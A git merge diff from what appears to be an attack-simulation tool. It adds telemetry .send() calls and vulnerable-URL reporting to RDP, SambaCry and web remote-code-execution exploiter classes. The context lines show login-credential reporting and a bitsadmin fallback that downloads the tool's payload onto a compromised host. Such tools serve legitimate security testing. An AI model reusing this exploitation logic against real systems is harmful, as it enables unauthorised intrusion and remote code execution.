Merge branch 'attack_report' into brute_force_report
This commit is contained in:
commit
2ab3be6437
|
@ -316,7 +316,7 @@ class RdpExploiter(HostExploiter):
|
||||||
|
|
||||||
if client_factory.success:
|
if client_factory.success:
|
||||||
if not self._config.rdp_use_vbs_download:
|
if not self._config.rdp_use_vbs_download:
|
||||||
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING)
|
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
|
||||||
self.add_vuln_port(RDP_PORT)
|
self.add_vuln_port(RDP_PORT)
|
||||||
exploited = True
|
exploited = True
|
||||||
self.report_login_attempt(True, user, password)
|
self.report_login_attempt(True, user, password)
|
||||||
|
|
|
@ -82,7 +82,11 @@ class SambaCryExploiter(HostExploiter):
|
||||||
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
|
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
|
||||||
if trigger_result is not None:
|
if trigger_result is not None:
|
||||||
successfully_triggered_shares.append((share, trigger_result))
|
successfully_triggered_shares.append((share, trigger_result))
|
||||||
self.add_vuln_port(self.SAMBA_PORT)
|
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
|
||||||
|
'host': self.host.ip_addr,
|
||||||
|
'port': self.SAMBA_PORT,
|
||||||
|
'share_name': share}
|
||||||
|
self.add_vuln_url(url)
|
||||||
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
||||||
|
|
||||||
for share, fullpath in successfully_triggered_shares:
|
for share, fullpath in successfully_triggered_shares:
|
||||||
|
@ -92,6 +96,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
LOG.info(
|
LOG.info(
|
||||||
"Shares triggered successfully on host %s: %s" % (
|
"Shares triggered successfully on host %s: %s" % (
|
||||||
self.host.ip_addr, str(successfully_triggered_shares)))
|
self.host.ip_addr, str(successfully_triggered_shares)))
|
||||||
|
self.add_vuln_port(self.SAMBA_PORT)
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
|
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
|
||||||
|
|
|
@ -307,7 +307,7 @@ class WebRCE(HostExploiter):
|
||||||
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
|
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
|
||||||
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
||||||
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
|
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
|
||||||
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING)
|
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
|
||||||
resp = self.exploit(url, backup_command)
|
resp = self.exploit(url, backup_command)
|
||||||
return resp
|
return resp
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue